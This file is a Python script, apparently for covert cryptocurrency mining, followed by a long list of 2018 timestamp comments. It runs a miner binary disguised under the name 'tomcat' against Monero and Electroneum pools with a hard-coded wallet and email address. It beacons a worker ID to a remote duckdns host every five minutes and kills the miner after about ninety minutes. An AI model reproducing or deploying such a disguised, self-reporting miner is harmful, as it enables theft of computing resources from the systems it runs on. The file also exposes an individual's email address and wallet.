import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:01.415619
#2018-02-17 17:23:04.971069
#2018-02-17 19:12:05.018056
#2018-02-17 21:02:04.012339
#2018-02-17 22:47:03.954206
#2018-02-18 00:32:02.235005
#2018-02-18 02:22:01.854435
#2018-02-18 04:09:03.539181
#2018-02-18 05:58:03.574449
#2018-02-18 07:49:02.199636
#2018-02-18 09:37:01.438379
#2018-02-18 11:23:01.647977
#2018-02-18 13:09:03.825166
#2018-02-18 14:57:01.289944
#2018-02-18 16:46:01.240381
#2018-02-18 18:34:07.502604
#2018-02-18 20:22:04.336832
#2018-02-18 22:08:05.620174
#2018-02-18 23:56:07.309985
#2018-02-19 01:43:01.240101
#2018-02-19 03:31:06.607978
#2018-02-19 05:16:06.934499
#2018-02-19 07:02:08.160790
#2018-02-19 08:51:04.205113
#2018-02-19 10:40:08.925129
#2018-02-19 12:28:07.975061
#2018-02-19 14:16:08.621528
#2018-02-19 16:05:04.100647
#2018-02-19 17:52:01.867722
#2018-02-19 19:40:04.467449
#2018-02-19 21:27:06.680948
#2018-02-19 23:12:06.888778
#2018-02-20 00:57:06.957001
#2018-02-20 02:49:01.924362
#2018-02-20 04:38:03.512575
#2018-02-20 06:22:04.365580
#2018-02-20 08:07:04.876409
#2018-02-20 09:53:06.903589
#2018-02-20 11:37:02.214125
#2018-02-20 13:24:07.503433
#2018-02-20 15:09:01.448141
#2018-02-20 16:53:13.180090
#2018-02-20 18:43:07.391721
#2018-02-20 20:34:05.985460
#2018-02-20 22:20:06.710353
#2018-02-21 00:02:04.881085
#2018-02-21 01:47:06.920187
#2018-02-21 03:34:06.480468
#2018-02-21 05:23:06.845984
#2018-02-21 07:10:10.106430
#2018-02-21 08:56:03.956886
#2018-02-21 10:46:01.999325
#2018-02-21 12:34:05.691553
#2018-02-21 14:21:06.985793
#2018-02-21 16:09:10.334938
#2018-02-21 18:01:01.208396
#2018-02-21 19:48:06.813368
#2018-02-21 21:36:08.975715
#2018-02-21 23:24:07.642318
#2018-02-22 01:13:07.084933
#2018-02-22 03:02:07.942980
#2018-02-22 04:47:06.748562
#2018-02-22 06:32:06.950737
#2018-02-22 08:19:07.754117
#2018-02-22 10:08:06.243416
#2018-02-22 11:53:06.587333
#2018-02-22 13:37:07.151010
#2018-02-22 15:27:03.883360
#2018-02-22 17:13:09.827165
#2018-02-22 19:01:04.734697
#2018-02-22 20:53:06.542428
#2018-02-22 22:39:02.157066
#2018-02-23 00:27:02.022474
#2018-02-23 02:15:08.822560
#2018-02-23 04:05:06.972165
#2018-02-23 05:51:05.204519
#2018-02-23 07:40:10.026819
#2018-02-23 09:46:04.017169
#2018-02-23 11:52:04.064668
#2018-02-23 13:43:02.190316
#2018-02-23 15:32:06.549819
#2018-02-23 17:20:10.003529
#2018-02-23 19:04:01.748505
#2018-02-23 20:50:08.734464
#2018-02-23 22:37:01.708650
#2018-02-24 00:24:02.020666
#2018-02-24 02:16:08.050313
#2018-02-24 04:07:06.092452
#2018-02-24 05:54:02.315742
#2018-02-24 07:42:02.009236
#2018-02-24 09:27:05.251085
#2018-02-24 11:21:03.986601
#2018-02-24 13:10:04.424231
#2018-02-24 15:00:01.431382
#2018-02-24 16:50:01.396683
#2018-02-24 18:38:05.942971
#2018-02-24 20:26:06.369890
#2018-02-24 22:22:01.606163
#2018-02-25 02:32:07.238479
#2018-02-25 06:13:02.125406
#2018-02-25 11:40:05.567972